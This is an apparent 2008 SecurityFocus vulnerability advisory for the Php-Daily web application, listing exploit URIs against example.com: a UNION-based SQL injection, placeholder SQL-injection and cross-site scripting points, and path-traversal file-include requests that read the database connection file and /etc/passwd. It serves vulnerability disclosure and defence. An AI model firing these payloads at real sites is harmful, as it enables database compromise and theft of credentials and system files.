Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

Php-Daily Multiple Input Validation Vulnerabilities

An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice an unsuspecting user into visiting a malicious URI.

The following exploit URIs are available:

SQL injection:
http://www.example.com/add_postit.php?mode=rep&id=-1+union+select+1,2,3,version(),5,6,7,8#
http://www.example.com/delete.php?prev=accueil&mode=postit&id=[SQL-INJ]
http://www.example.com/prest_detail.php?prev=[SQL-INJ]
http://www.example.com/mod_prest_date.php?prev=list&id=[SQL-INJ]

File include:
http://www.example.com/download_file.php?fichier=../include/connect.php
http://www.example.com/download_file.php?fichier=../../../../../../etc/passwd

Cross-site scripting:
http://www.example.com/add_prest_date.php?date=[XSS]







 

Privacy Statement
Copyright 2008, SecurityFocus